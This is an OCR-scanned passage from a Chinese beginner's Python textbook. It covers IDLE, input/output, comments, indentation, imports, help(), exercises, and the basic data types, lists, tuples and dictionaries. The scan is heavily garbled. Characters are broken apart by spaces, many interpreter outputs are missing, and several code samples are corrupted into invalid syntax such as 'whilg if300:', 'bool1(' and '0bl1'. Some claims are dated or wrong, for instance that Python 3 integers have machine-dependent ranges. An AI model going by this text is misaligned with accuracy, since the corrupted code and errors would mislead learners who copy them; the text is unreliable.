Python 中 的 操作 符 当 然 有 优先 级 ,详情 请 参见 第 2 章 , 如 果 不 想 引起 操作 符 优先 级 的 
错误 ,可 以 使 用 ( ) 把 优先 计算 的 表达 式 括 起 来 。 

2. 编辑 程序 

编辑 并 运行 程序 ,你 可 以 选择 自己 心仪 的 IDE 环境 ,PyCharm 和 Eclipse 在 上 文中 已 有 
介绍 ,这 里 介绍 Python 自 带 的 IDLE 的 简单 使 用 方法 。 

在 IDLE 中 选择 菜单 File~New File 命令 ,打开 程序 编辑 窗口 ,在 这 里 就 可 以 编辑 程 
序 。 通 常 程序 的 第 一 句 是 : 

划一 * 一 coding:utf-8-x*- 

或 

#coding:utf -8 

这 一 语句 ,表示 程序 保存 时 将 使 用 UTF-8 编码 保存 ,因为 Python 是 跨 平台 能 处 理 世 界 
范围 内 字符 的 语言 ,所 以 最 好 指定 程序 保存 所 用 的 编码 方式 。 

像 许多 教程 一 样 , 先 做 一 个 简单 示例 程序 ,如 图 1-10 所 示 。 

保存 程序 : 选择 菜单 File>Save 命令 即 可 保存 程序 文件 。 

3. 程序 的 运行 

运行 程序 有 以 下 两 种 方式 。 

1) 在 IDE 环境 中 运行 程序 

在 PyCharm 和 Eclipse 中 运行 程序 的 方法 参见 1.4 节 ,在 IDLE 中 ,选择 菜单 Run 一 
Run Module 命令 即 可 运行 ,或 者 按 快捷 键 F5 也 可 以 运行 程序 ,如 图 1-11 所 示 。 








#-+-coding:u 


Print ("欢迎 来 





#-*-coding:utf-8-— 


print ("欢迎 来 到 Python 世 界 ! ")| 





图 1-10 简单 示例 图 1-11 在 IDLE 中 运行 程序 


2) 命令 行 下 运行 程序 

Windows 7 操作 系统 下 ,打开 保存 有 准备 运行 的 程序 的 文件 夹 , 按 住 Shift 键 , 右 击 , 在 
弹出 的 快捷 菜单 中 选择 “在 此 处 打开 命令 窗口 ”命令 , 即 可 打开 命令 行 窗 口 并 且 工 作 目 录 就 
是 程序 所 在 的 目录 。 输 入 “python 程序 名 . py” 即 可 执行 程序 ,如 图 1-12 所 示 。 














图 1-12 命令 行 下 运行 程序 


4. 输入 /输出 
Python 中 使 用 input() 实 现 输入 功能 ,使 用 的 方法 是 : 
x= input(" 提 示 : ") 


input() 函 数 括号 中 的 "提示 :" 是 提示 信息 ,可 以 写成 需要 的 提示 信息 ,input() 函 数 获 
取 的 输入 内 容 是 一 个 字符 串 ,如 果 要 实现 其 他 数据 类 型 的 运算 ,需要 进行 类 型 的 转换 ,如 : 


i= int(x) 


语句 把 x 转换 成 整数 。 
Python 的 输出 语句 为 print() ,可 以 把 要 输出 的 内 容 显示 在 屏幕 上 。 如 : 
>>> x = input(" 请 输入 你 的 年 龄 : ") # 把 输入 的 字符 串 赋 值 给 x 


请 输入 你 的 年 龄 : 18 
>>> i= int(x) # 把 字符 串 x 转变 为 整数 赋值 给 变量 i 
>>> age5 = i+5 


>>> print("5 年 后 你 的 年 龄 是 %d" % age5) # 输 出 字符 串 , %d 表示 一 个 整数 
5 年 后 你 的 年 龄 是 23 


关于 print() 函数 的 更 详细 内 容 请 参见 2.6 节 。 
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5. 注释 

Python 中 的 注释 分 为 行 注释 和 块 注释 。 

行 注释 用 # 表示, 行 注释 的 作用 是 告诉 解释 器 并 后 面 的 内 容 是 注释 而 不 是 Python 语 
句 , 不 用 解释 执行 # 后 面 的 内 容 。 

Python 中 用 三 引号 表示 块 注释 ,如 图 1-13 所 示 。 

6. 缩 进 

Python 中 没有 表示 语句 块 的 {} ,也 没有 表示 行 结束 的 “; ”, 而 是 使 用 缩 进 表示 程序 的 
逻辑 层次 关系 ,Python 解释 器 也 是 依靠 缩 进 对 代码 进行 解释 和 执行 的 ,同时 ,代码 块 的 合 
理 缩 进 也 能 帮助 程序 员 理 解 代码 ,并 养 成 良好 的 编程 习惯 。 如 使 用 while 循环 求 100 以 内 
所 有 奇数 的 和 ,如 图 1-13 所 示 ,逻辑 层次 一 样 的 语句 , 缩 进 也 是 一 样 的 。 

八 注意 : 表示 缩 进 开始 的 冒号 (:) 不 能 少 。 


Fle Edit Format Run Options Window Help 


#-*-coding:utf-8-*— 





本 程序 用 while 循 环 控制 数 ”范围 ， a 
用 if 判 断 是 否 为 奇 堵 一 一 块 注释 
最 后 输出 奇 堵 和 a 

5 行 注释 


缩 进 


whilg if300: # 控 制 数 的 范围 
1 21=0: # 判 断 是 否 为 奇数 
sum = sumt+i # 求 和 
=i+1 
print ("1+...+99 = Sd"%sum) 





图 1-13 ”Python 的 注释 与 缩 进 


7. 模块 的 导入 

Python 是 以 模块 来 管理 函数 和 类 的 .要 使 用 某 个 函数 和 类 .需要 导入 该 模块 ,常见 导入 
模块 的 方法 有 以 下 两 种 。 

1) 导入 整个 模块 

一 般 格 式 为 

import 模块 名 [, 模 块 名 [ ,模块 名 ]] 

模块 名 就 是 程序 文件 名 ,不 含 . py, 可 一 次 导入 多 个 模块 ,调用 模块 中 的 函数 或 类 时 ,以 
模块 名 为 前 级 ,这 样 程序 的 可 读 性 较 好 。 如 : 


>>> import time 
>>> print(time. ctime()) 


Mon Jul 31 10:09:24 2017 


2) 与 from 联 用 导入 某 对 象 
导入 的 格式 为 


fronm 模块 名 import 对 象 名 [, 对 象 名 ] 
这 种 导入 方式 只 导入 模块 中 的 一 个 或 多 个 对 象 , 调 用 时 仅 使 用 对 象 名 。 如 : 


>>> from math import sin, pi 
>>> sin(pi/2) 


1.0 


8. 使 用 help() 


在 学 习 Python 的 过 程 中 , 遇 到 困惑 是 很 常见 的 ,这 时 可 以 使 用 help() 函 数 查看 帮助 信 
息 , 如 图 1-14 所 示 。 


人 yon: 
Fle Edit Shell Debug Options Window Help 
Python 3.4.3 (v3.4.3:9b73flc3e601, Feb 24 2015, 22:44:40) [MSC v.1600 64 bit (RM 这 
D64)] on win32 
Type "copyright", "credits" or "license()" for more information. 
>>> help (input) 
Help on built-in function input in module builtins: 





input (...) 
input ([prompt]) -> string 


Read a string from standard input. The trailing newline is stripped. 

IE the user hits EOF (Unix: Ctl-D, Windows: Ctl-2+Return), raise EOFError. 
On Unix, GNU readline ia used if enabled. The prompt string, if given, 
is printed without a trailing newline before reading. 


>>>| 





图 1-14 使 用 help 〇 函数 查看 帮助 信息 
还 可 以 使 用 help() 函 数 查看 模块 中 对 象 的 帮助 信息 。 如 : 


>>> import math 
>>> help(math. sin) 


Help on built -~ in function sin in module math: 


sin(.) 
sin(x) 


Return the sine of x (measured in radians). 


也 可 以 查看 整个 模块 的 帮助 信息 ,通常 情况 下 ,帮助 信息 非常 多 ,需要 使 用 者 查找 自己 
感 兴趣 的 内 容 。 如 : 


>>> import os 
>>> help(os) 


9. 查看 Python 帮助 文档 


Python 安装 后 ,通常 在 Python 安装 目录 的 Doc 目录 (如 : C:\Python34\Doc) 下 会 有 
Python 帮助 文档 python3xx. chm ,打开 此 文档 可 以 查看 Python 帮助 文档 。 


16 〗 Python 编程 入 门 与 案例 详解 
另外 ,在 浏览 器 中 打开 http://python. usyiyi. cn/translate/python_352/index. html, 可 
以 浏览 Python 3. 5 中 文 帮助 文档 。 


习 题 


一 、 判断 题 
.Python 语言 是 一 门 编译 型 语言 。 
.Python 语言 由 某 商 业 公司 负责 开发 和 运 维 。 
.Python 的 大 量 第 三 方 扩 展 库 都 是 付费 的 。 
. PyCharm 软件 是 开源 的 ,可 以 随便 下 载 使 用 。 
。 Eclipse 是 Java 开发 工具 包 ,不 能 用 于 Python 开发 。 
. Python 开发 程序 不 可 以 转变 成 为 EXE 格式 的 文件 。 
.安装 Python 虚拟 环境 的 目的 是 让 每 个 开发 环境 不 相互 影响 。 
.Python 程序 是 以 空格 (” ”) 作 为 层次 关系 标识 符 的 。 
. Python 编辑 器 通常 都 具有 提示 功能 。 
Python 代码 可 以 被 任何 人 随意 查看 ,没有 办 法 加 密 保 护 版 权 。 
二 、 选 择 题 
1， Python 源 代 码 的 扩展 名 为 (  )。 
A. pyt B. py C. python D. pyc 
2. Python 程序 可 以 被 编译 成 ) 字 节 码 文件 。 
A. pyt B. py C. python D. pyc 
.Python 语言 的 行 注 释 符 为 ( ) 。 
AsH1 Be 1 C= D. # 
简 答 题 
简 述 Python 程序 的 执行 方法 。 
2. 简 述 Python 语言 的 特征 及 优 缺 点 。 


Coma DD- 
一 一 一 一 一 一 一 一 一 一 
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数据 类 型 是 学 习 一 门 编程 语言 必须 首先 掌握 的 知识 ,Python 中 的 数据 类 型 与 C 语言 等 
编译 型 语言 不 太一 样 ,在 C 语言 中 的 数据 类 型 是 需要 预定 义 的 ,而 Python 不 用 ,Python 是 
根据 赋值 的 结果 来 自动 识别 数据 类 型 的 ,这 样 做 虽然 使 用 起 来 非常 方便 ,但 同时 也 降低 了 执 
行 效率 。Python 中 的 数据 类 型 有 布尔 型 . 整 型 .复数 、 带 点 型 实数 等 ,下 面 就 分 别 加 以 介绍 。 


2.1 数据 类 型 


程序 最 基本 的 功能 就 是 对 数据 进行 处 理 , 在 程序 运行 过 程 中 , 若 数据 的 值 是 不 发 生变 化 
的 量 , 称 为 "常量 ”"。Python 常量 包括 布尔 值 . 数 值 .字符 串 和 空 值 。 下 面 就 来 介绍 这 些 常 量 
以 及 常用 数据 结构 : 列表 、 元 组 .字典 、 集 合 。 

2.1.1 布尔 型 

布尔 型 只 有 两 个 值 , 即 布尔 值 True 和 False, 尽 管 布尔 值 看 上 去 是 True 和 False 两 个 
值 ,但 它 事实 上 是 整 型 的 子 类 ,对 应 于 整数 类 型 的 1 和 0, 在 数学 运算 中 ,Boolean 值 的 True 
和 False 分 别 对 应 于 1 与 0; 对 于 值 为 0 的 任何 数字 或 空 集 在 Python 中 布尔 值 都 是 False。 
例如 : 


>>> bool(1) 
True 

>>> bool(0) 
False 

>>> bool(True) 
True 


>>> bool1( '0') 
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True 


>>> bool([]) 
False 
>>> bool1( (2,3)) 


True 


>>a=13 
>>b=a<100 
>>b 


True 

>>> b+ 100 

101 

>>> True + True 
2 

>>> True 一 False 
和 

>>> True * False 
0 


Python 语言 中 有 一 个 特殊 的 值 None, 它 表示 空 值 , 它 不 同 于 逻辑 值 False 数值 0、 空 字 
符 串 …, 它 表示 的 含义 就 是 没有 任何 值 , 它 与 其 他 任何 值 的 比较 结果 都 是 False。 


>>> None == False 
False 

>>> ''== None 
False 

>>> None == 0 
False 

2.1.2 整 型 


在 Python 中 整 型 是 最 常用 的 数据 类 型 , 它 的 取 值 范围 与 所 用 机 器 有 关 , 在 32 位 机 器 上 
取 值 范围 是 一 2 一 23 一 1, 即 一 2147483648 一 2147483647; 在 64 位 机 器 上 , 取 值 范围 是 
一 2% 一 2 一 1 , 即 一 9223372036854775808 一 9223372036854775807。Python 中 标准 整 型 也 
支持 八进制 与 十 六 进 制 , 当 用 八进制 表示 整数 时 ,数值 前 面 要 加 上 一 个 前 缀 00; 当 用 十 六 进 
制 表 示 整 数 时 ,数字 前 面 要 加 上 前 缀 0X 或 0x; 当 用 二 进 制 表示 整数 时 ,数值 前 面 要 加 上 一 
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个 前 缀 0b。 


>>> import sys 


>>> print(sys. maxsize) 


9223372036854775807 


>>> aa = 0X123 
>>> bb = 0x345 
>>> cc = 0o123 # 注意 第 一 个 字符 为 数字 0, 第 二 个 字符 为 字母 o 
>>> print(aa) 


291 
>>> print(cc) 
83 


>>> dd = 0bl1 
>>> print(dd) 


3 


从 注意 : 在 Python 3 中 已 没有 长 整 型 数据 类 型。 


2.1.3 浮 点 型 


浮 点 数 用 于 表示 带 有 小 数 的 数据 ,通常 都 有 一 个 小 数 点 和 一 个 可 选 的 后 级 e, 在 e 和 指 
数 之 间 可 以 有 正 ( 十 ) 或 负 ( 一 ) 表 示 指 数 的 正 负 ( 正 数 可 以 省 略 符号 ) 。 

>>>a=0.0 

>>> b= - 1234. 

>Cc=3.4 

>>> d= -3.23445 

>>> e=23e4*2.0 

>> f= -2.2345e— 13 


2.1.4 复数 

复数 由 实数 部 分 和 虚数 部 分 构成 ,表示 方法 为 real 十 imagj, 实 数 部 分 和 虚数 部 分 都 是 
浮 点 型 ,虚数 部 分 必须 加 后 级 j 或 ]。 下 列 是 复数 的 例子 : 

23.45+2j 2.34--98.6j 65.34+342.1j 3.2l1el2+34.52e-12j 一 .1234+0] 

2.1.5 数据 类 型 转换 

当 有 多 个 数据 类 型 进行 混合 运算 时 ,就 涉及 数据 类 型 的 转换 问题 。 当 两 个 数 的 类 型 一 
致 时 没有 必要 进行 数据 类 型 转换 ; 当 数 据 类 型 不 同时 ,Python 会 检查 一 个 数 是 否 可 以 转换 
为 另 一 个 类 型 。 如 果 可 以 则 自动 进行 数据 类 型 转换 。 数 据 类 型 转换 的 基本 原则 是 : 整 型 转 
换 为 浮 点 型 , 浮 点 型 转换 为 复数 。 


>>3+4.5 


>5.6 + (1.2+3.4)) 


数据 类 型 转换 是 自动 的 ,不 需要 编码 进行 类 型 转换 。 但 是 ,在 一 些 特定 的 场合 下 ,需要 
进行 一 些 数据 类 型 转换 。 转 换 函 数 有 int() \float() .complex() ,可 以 使 用 type() 函数 检测 
数据 类 型 。 


>>> int(3.4) 


>>> float(3) 


>>> int( 一 2.6) 


>>> complex(3.4, —4.5) 


>>> complex(5) 


>>> complex(3. 4e5, 54. 34e9) 


>>> type(3.4) 


>>> type(3) 


2.1.6 数据 的 比较 


Python 中 数据 的 大 小 比较 运算 符 有 = 一 .> 一 、 志 =、! 一 、 > 二 and\or 分 别 表示 等 
于 .大 于 或 等 于 .小 于 或 等 于 ,不 等 于 .大 于 .小 于 .和 、 或 运算 。 


>>> 45.23 == 12.43 


>>> 45.23>= 12.43 
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>>> 45.23<= 12.43 


>>> 45.23!= 12.43 


>>> (23<45) and (2<9) 


>z> (-4>5) or (3<7) 


2.1.7 数值 运算 


Python 的 数值 运算 符 有 单 目 操作 符 正 号 (十 )、 负 号 (一 ); 双 目 运算 符 十 、 一 、* 、/、%、 
xx、//, 分 别 表示 加 \ 减 ,乘除 ` 取 余 、 乘 方 ,整除 。 运 算 示 例如 下 : 


>>1+3.4 


>>4.5-8 


>>> 45#* 一 3 


>> 13%3 


>>> 13/3 


>>2x #4 


>>> 1//3 


>>> 13//3 


>>> -13//3 
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DZDP -13%3 


2 


2.1.8 按 位 运算 


Python 中 按 位 运算 符 有 按 位 与 (&) , 按 位 或 (| ) 、 按 位 异 或 (^)、 按 位 取 反 (一 ) 以 及 位 移 
运算 符 : 左 移 ( 志 <<) . 右 移 (>> 二 ) 。 


>>> 一 13 


= 


>>> 40&67 


0 


>>> 40167 


107 


>>> 3<2 


2 


>>> 34>3 


4 


2.1.9 ”常见 运算 函数 
Python 常用 数值 运算 函数 如 表 2-1 所 示 。 
表 2-1 Python 常用 数值 运算 函数 























函 数 名 函数 功能 示 例 返回 值 
absCnumber) 返回 数字 的 绝对 值 abs( 一 23) 23 
pow(x,y[ ,2]) 返回 x 的 y 次 竹 ( 所 得 结果 对 z 取 模 ) pow(3,3) 27 

运算 结合 ,返回 一 个 
divmod(numl ,num2) ti ri Te divmod(13,3) Cra 
round(number[ ,ndigits]) | 根据 给 定 的 精度 对 数字 进行 四 舍 五 人 round(3. 4567812,3) | 3.457 
2.2 列 表 
2.2.1 序列 


序列 是 编程 语言 中 常见 的 一 种 数据 存储 方式 , 它 是 一 系列 连续 的 、 相 关 的 ,并 按 一 定 顺 
序 排列 的 数据 。 支 持 成 员 关 系 操作 符 (in) 、 大 小 计算 函数 (len())、 分 片 ([]), 且 可 以 迭代 。 
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Python 中 有 5 种 序列 类 型 : bytearray、bytes \list\tuple 以 及 str。 图 2-1 显示 了 一 个 序列 ， 

序列 中 的 元 素 是 由 序列 名 十 位 置 编号 构成 的 ,如 aL2], 序 列 的 位 置 编 号 是 从 零 开 始 的 , 因 

此 ,序列 的 第 一 个 元 素 是 aL0], 第 二 个 元 素 是 aL1], 依 此 类 推 ; 序列 也 可 以 从 尾部 开始 访 

问 , 最 后 一 个 元 素 是 aL 一 1 ,倒数 第 二 个 是 a[ 一 2], 依 此 类 推 。 









































正 向 位 置 编号 | 序列 元 素 值 | 反 向 位 置 编 号 
al0] 520 a[-10] 
al1] 1314 a[-9] 
a[2] 53719 a[-8] 
al3] 360 a[-7] 
al4] 259695 a[-6] 
al5] 234 a[-5] 
alg] 35925 a[-4] 
al7] 246 a[-3] 
af8] 8013 a[-2] 
af9] 1392010 a[-1] 





图 2-1 序列 示意 图 


2.2.2 列表 的 定义 


列表 是 Python 内 置 的 可 变 序列 ,是 若干 个 元 素 的 连续 内 存 空间 ,列表 的 每 一 个 成 员 被 
称 为 元 素 ,列表 的 所 有 元 素 放 在 一 对 方 括号 ([]) 中 ,并 用 逗号 分 隔 开 。 如 : 

[1314, 246, 259695, 520] 井 所 有 元 素 都 是 整数 

['apple', 'banana', 'orange', 'peach'] 井 所 有 元 素 都 是 字符 串 

['apple', 0,3.14, 'peach', [12,345]] 

# 列表 的 元 素 可 以 是 整数 、 浮 点 数 、 字 符 串 ,其 至 列表 、 元 组 .字典 、 集 合 等 类 型 的 对 象 


图 2-2 所 示 为 列表 索引 位 置 图 。 




















L[0] LU LD] L[3] L[4] 
apple' 0 | 3.14 "peach | [12.345] 
L[-5] LC4] L[-3] L[-2] LI 


图 2-2 列表 索引 位 置 图 


2.2.3 列表 的 创建 与 删除 

与 其 他 Python 对 象 一 样 ,直接 使 用 一 将 列表 赋值 给 变量 即 可 ,例如 : 

list a = [1314,246,259695,520] 

也 可 以 使 用 list( 〇 函数 将 元 组 .range 对 象 . 字 符 串 、 其 他 可 迭代 对 象 转换 为 列表 。 如 : 


>>> list b = list((2,4,6,8,0)) 
>>> list_b 


[2, 4, 6, 8, 0] 


>>> list c = list(range(1,20,2)) 
>>> list c 


| pe | 
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>>> list d = 1ist('I Love You') 
>>> list d 


这 里 用 到 的 range([start, ] stop[，step]) 类 ,返回 一 个 整数 序列 的 列表 ,[start] 表 示 起 
始 值 ( 可 以 省 略 , 默 认为 0) ,stop 为 终止 值 (返回 结果 不 包括 这 个 值 ); [step] 为 步 长 , 即 这 个 
序列 的 元 素 之 间 的 步 长 ,可 以 省 略 ,默认 为 1。 

当 不 再 需要 某 个 列表 时 ,可 以 使 用 del 删除 该 列表 ,如 : 


>>> del list d 
>>> list_d 


Traceback (most recent call last): 
File "<pyshell# 41 >", line 1, in <module> 
list d 
NameError: name 'list _d' is not defined 


2.2.4 列表 的 读 取 
读 取 列表 采用 列表 名 加 元 素 序号 ( 放 在 口中 ) ,注意 : 列表 元 素 的 序号 是 从 0 开始 的 ,最 
后 一 个 元 素 的 序号 是 一 1。 


>>> list_a = [1314,246,259695,520] 
>>> print(list a[ -1]) 


520 


>>> print(list_a[0]) 


1314 


>>> print(len(list_a)) 


4 


>>> print(list_a[5]) 


Traceback (most recent call last) : 
File "<pyshell#3>", line 1, in<module> 
print(list a[5]) 
IndexError: list index out of range 
# 序 号 超出 索引 范围 ,产生 异常 
>>> print(list a[ -5]) 
井 同样 这 条 语句 也 会 产生 异常 


切片 读 取 
切片 读 取 的 方法 是 列表 名 加 列表 的 读 取 范围 (列表 序列 对 ) ,范围 包括 序列 对 的 开始 位 
置 ,但 不 包括 序列 对 的 结束 位 置 。 若 从 序列 的 开始 处 读 取 ,开始 位 置 可 省 略 ,默认 为 0; 结束 
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位 置 若 到 序列 尾部 ,也 可 省 略 ,默认 为 列表 长 度 。 
>>> print(list_a[1:3]) 
[246, 259695] 
>>> print(list_a[1: -1]) 
[246, 259695] 
>>> print(list_a[ :2]) 
[1314, 246] 
>>> print(list_a[1:]) 
[246, 259695, 520] 
>>> print(list_a[ :]) 


[1314, 246, 259695, 520] 


2.2.5 列表 元 素 的 增加 与 删除 


1. 增加 列表 元 素 

1) 使 用 “十 "运算 符 

使 用 * 十 "运算 符 , 可 以 将 一 个 新 列表 元 素 附加 在 列表 的 尾部 。 
>>> print(list_a) 


[1314, 246, 259695, 520] 


>>> list a= list a+[25184,241] 
>>> list_a 


[1314, 246, 259695, 520, 25184, 241] 


2) 使 用 append() 方 法 
使 用 append() 方 法 在 列表 的 尾部 添加 一 个 新 元 素 。 


>>> list_a.append([0]) 
>>> list a 


[1314, 246, 259695, 520, 25184, 241, [0]] 


>>> list_a. append(0) 
>>> list a 


[1314, 246, 259695, 520, 25184, 241, [0], 0] 


3) 使 用 extend() 方 法 
使 用 extend() 方 法 可 以 将 另 一 个 可 和 迭代 对 象 的 所 有 元 素 添加 到 列表 的 尾部 。 
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>>> list_a.extend([1,2]) 
>>> list a 


[1314, 246, 259695, 520, 25184, 241, [0], 0, 1, 2] 


4) 使 用 insert() 方 法 
使 用 insert() 方 法 将 元 素 插入 列表 的 指定 位 置 。 


>>> list a. insert(2, - 1) 
>>> list a 


[1314, 246, — 1, 259695, 520, 25184, 241, [0], 0, 1, 2] 


这 里 insert() 方 法 的 第 一 个 参数 是 插入 的 位 置 ,第 二 个 参数 是 待 插入 的 元 素 。 

在 以 上 这 些 增加 元 素 的 运算 中 ,“ 十 ”运算 符 与 insert() 方 法 运算 效率 较 低 ,append( ) 与 
extend() 方 法 运算 效率 较 高 。 在 进行 “十 "运算 时 ,生成 了 新 的 列表 ,进行 insert() 运 算 时 , 插 
入 位 置 之 后 的 元 素 要 移动 位 置 ,这 会 影响 处 理 的 速度 。append() 与 extend() 方 法 都 是 在 原 
位 置 扩展 列表 ,运算 效率 较 高 。 

2. 删除 列表 元 素 

1) 使 用 del 语句 删除 列表 或 列表 元 素 

del 语句 后 跟随 列表 名 加 下 标 。 

>>> list_ a= [1314, 246, 259695, 520, 25184, 241] 


>>> del list_a[3] # 删除 列表 中 的 一 个 元 素 
>>> list a 


[1314, 246, 259695, 25184, 241] 

>>> del list_a[1:3] # 删除 列表 中 的 一 个 切片 
>>> list_a 

[1314, 25184, 241] 

>>> del list a # 删除 整个 列表 

>>> list a 


Traceback (most recent call last): 
File "<pyshell#31>", line 1, in<module> 
list a 
NameError: name 'list a' is not defined 


2) 使 用 remove() 方 法 
传递 的 参数 为 列表 中 元 素 的 值 。 
>>> list a= [1314, 246, 259695, 520, 25184, 241] 


>>> list a. remove(246) 
>>> list a 


[1314, 259695, 520, 25184, 241] 
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3) 使 用 pop0 〇 方法 弹出 列表 元 素 

若 未 传递 参数 给 pop 〇 方法 . 则 默认 删除 列表 最 后 一 个 元 素 ; 若 传递 一 个 下 标 作 参 数 ， 
则 删除 该 元 素 或 出 错 。 

>>> list a 

[1314, 259695, 520, 25184, 241] 

>>> list_a. pop() 

241 

>>> list a 

[1314, 259695, 520, 25184] 

>>> list_a. pop(1) 

259695 

>>> list a 


[1314, 520, 25184] 


八 注意 : 删除 列表 元 素 后 ,列表 会 自动 收缩 ,列表 中 不 会 出 现 空隙 。 
2.2.6 列表 的 其 他 常用 方法 


1. index() 方 法 
返回 列表 元 素 在 列表 中 的 准确 位 置 。 
>>> list a 


[1314, 520, 25184, 520] 


>>> list a. index(520) 


本 


>>> list_a. index(259695) # 若 该 元 素 未 在 列表 中 , 则 出 现 异 常 


Traceback (most recent call last): 
File "<pyshell#62>", line 1, in<module> 
list a. index(259695) 
ValueError: 259695 is not in list 


2. count() 方 法 
返回 某 元 素 在 列表 中 出 现 的 次 数 。 
>>> list a. count(520) 


2 


>>> list_a.count(259695) 


3. in 运算 


>>> list a 


>>> 520 in list a 


>>> [520] in list a 


4. sort() 方 法 
sort() 方 法 实现 对 列表 的 排序 ,默认 为 升序 。 若 要 降序 排列 , 则 需要 添加 参数 reverse 一 


True。 


>>> list_a 


>>> list_a. sort() 
>>> list_a 


>>> list a. sort(reverse = True) 
>>> list a 


当然 ,也 可 以 使 用 Python 内 置 函 数 sorted() 进 行 排序 。 


>>> sorted(list a) 


5. lenO 〇 函数 
len() 函数 为 Python 内 置 函 数 ,返回 列 表 的 元 素 个 数 。 


>>> len(list_a) 


6. max() 函 数 
max() 函 数 为 Python 内置 函数 ,返回 数值 型 列表 中 的 最 大 值 。 
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>>> max(list a) 


25184 


7. minO 〇 函数 
min() 函 数 为 Python 内 置 函 数 ,返回 数值 型 列表 中 的 最 小 值 。 
>>> min(list a) 


520 


8. sum() 函 数 
sum() 函 数 为 Python 内 置 函 数 ,返回 数值 型 列表 中 元 素 的 和 ,对 非 数 值 型 列表 运算 则 
会 出 错 。 


2.3 元 组 


元 组 与 列表 类 似 , 定 义 元 组 时 ,把 所 有 元 素 都 放 在 一 对 圆 括号 内 , 即 () ,与 列表 的 最 大 不 
同 就 是 元 组 的 元 素 是 不 可 变 的 。 因 此 ,元 组 一 旦 创建 ,不 能 对 其 进行 修改 ,也 不 能 添加 或 删 
除 其 元 素 ,只 能 创建 一 个 新 的 元 组 。 

1. 元 组 的 创建 

使 用 “二 ”把 一 个 元 组 赋值 给 变量 , 即 可 创建 一 个 元 组 。 


>>> tuple a= (1,3,5,7,9) 
>>> tuple_a 


(1, 3, 5, 7, 9) 


>>> tuple_b = ('apple', ‘banana', 'orange', 'peach') 
>>> tuple_b 


('apple', ‘banana', ‘orange', 'peach') 


使 用 tuple 〇 函数 可 以 将 其 他 类 型 序列 转换 为 元 组 。 


>>> list a 


[25184, 1314, 520, 520] 


>>> tuple(list a) 
(25184, 1314, 520, 520) 
>>> print(tuplel( 'abcdefg')) 


(av De rd ev 'f', 'g') 


元 组 在 访问 、 切 片 . 运 算 上 与 列表 有 许多 相似 之 处 ,可 参考 列表 的 使 用 方法 ,这 里 不 再 
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效 述 。 

2. 元 组 与 列表 的 区 别 

元 组 与 列表 有 许多 相似 之 处 ,但 它们 之 间 也 存在 以 下 差别 。 

(1) 列表 是 可 变 的 序列 ,而 元 组 是 不 可 变 的 。 因 此 ,列表 可 以 用 append() 、extend() 和 
insert() 方 法 来 添加 元 素 , 用 remove()、pop() 方 法 删除 列表 中 的 元 素 。 而 元 组 则 没有 这 些 
方法 ,只 能 用 del 命令 删除 整个 元 组 ,可 以 这 样 认为 : 使 用 元 组 是 把 这 些 数据 冻结 起 来 了 ,使 
用 列表 则 是 把 这 些 数 据 解冻 了 ,因此 ,使 用 元 组 会 更 安全 。 

(2) 元 组 的 访问 速度 更 快 。 对 一 个 序列 进行 运算 时 ,如 果 只 对 它们 进行 遍历 或 其 他 运 
算 ,而 不 需要 对 它们 进行 修改 , 则 使 用 元 组 会 更 快捷 。 

(3) 一 些 元 组 可 以 作为 字典 的 键 ,而 列表 不 可 以 。 这 是 因为 列表 是 可 变 的 ,而 元 组 是 不 
可 变 的 。 


2.4 字 典 


字典 是 “ 键 : 值 ? 对 的 无 序 可 变 序列 ,字典 中 的 每 一 个 元 素 都 由 两 部 分 构成 : 键 与 值 。 
键 与 值 之 问 用 冒号 分 开 ,多 个 * 键 : 值 ? 对 之 间 用 逗号 分 隔 ,所 有 元 素 放 在 一 对 大 括号 中 。 字 
典 的 键 可 以 由 任意 不 变数 据 充 当 , 如 整数 .实数 .复数 .字符 串 与 元 组 等 ,但 不 能 由 列表 字典 
与 集合 来 充当 ,因为 键 要 求 不 可 变 且 不 能 重复 ,字典 中 的 值 可 以 重复 。 字 典 中 的 每 个 键 只 能 
对 应 一 个 值 , 也 就 是 说 ,一 键 对 应 多 值 是 不 允许 的 。 


2.4.1 字典 的 创建 

使 用 “= 二" 将 字典 赋值 给 变量 , 即 可 创建 一 个 字典 型 变量 。 

>>> dict_a = {'name':' 张 三 ', 'sex': 'male', 'age':18, 'married':False} 
也 可 使 用 dict() 函 数 将 已 有 数据 转变 为 字典 。 


>>> dict b = dict((['a',3],['b',4])) 
>>> dict_b 


CD a 3 


>>> values = [1,2,3] 
>>> dict c = dict(zip(keys,values)) 
>>> dict c 


Ry ea ea 


>>> dict_d= dict(name = ' 李 四 ', sex = 'male',age = 18) 
>>> dict d 


{'age': 18，'sex': 'male'，'name': ' 李 四 '} 


还 可 以 使 用 内 建 方法 fromkeys() 来 创建 一 个 “默认 "字典 ,字典 中 元 素 都 具有 相同 值 ， 
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若 未 给 出 ,默认 为 None。 


>>> dict e= {}.fromkeys(('x' 'y'), — 5) 
>>> dict e 


{'y’: =5, 'x': =5} 
>>> dict f= dict.fromkeys(['name', 'sex']) 
>>> dict f 


{'sex': None, 'name': None} 


2.4.2 字典 元 素 的 访问 


1. 根据 键 访问 值 

与 列表 、 元 组 的 访问 方法 相 类 似 , 列 表 、 元 组 是 通过 下 标的 方法 来 访问 它们 的 值 ,而 字典 
的 访问 则 是 通过 键 来 实现 的 。 若 访问 的 键 不 存在 , 则 抛 出 异常 。 

>>> dict_a[ name'] 

张 三 ， 

>>> dict_a[ 'address'] 


Traceback (most recent call last) : 
File "<pyshell#106>", line 1, in<module> 
dict a[ 'address'] 
KeyError: 'address' 


2. 使 用 get() 方 法 访问 值 

从 上 面 的 例子 可 以 看 出 ,根据 键 查找 值 的 方式 不 够 安全 ,推荐 使 用 get() 方 法 ,get() 方 法 
可 以 获取 指定 键 的 值 , 若 指定 的 键 不 存在 , 则 返回 指定 的 值 ; 若 不 指定 , 则 返回 None。 

>>> print(dict_a.get('address')) 


None 
>>> print(dict_a. get( 'address', ' 该 键 不 存在 ')) 
该 键 不 存在 


3. 字典 的 遍历 

使 用 items() 方 法 可 以 获得 字典 的 “ 键 : 值 ” 对 列表 ; 使 用 keys() 方 法 可 以 获得 字典 的 
“ 键 ? 列 表 ; 使 用 values() 方 法 可 以 获得 字典 的 * 值 列表。 下面 就 使 用 这 三 种 方法 对 字典 进 
行 遍历 。 

方法 一 : 


>>> for item in dict a. items() : 
print(item) 





方法 二 : 


>>> for key in dict a. keys(): 
print(key,":",dict a[key]) 





方法 三 ， 


>>> for key, value in dict a. items(): 
print(key, ':', value) 





获取 键 与 值 列表 。 


>>> print(dict a. keys()) 





>>> print(dict a.values()) 





2.4.3 字典 的 操作 


1. 更 新 字典 
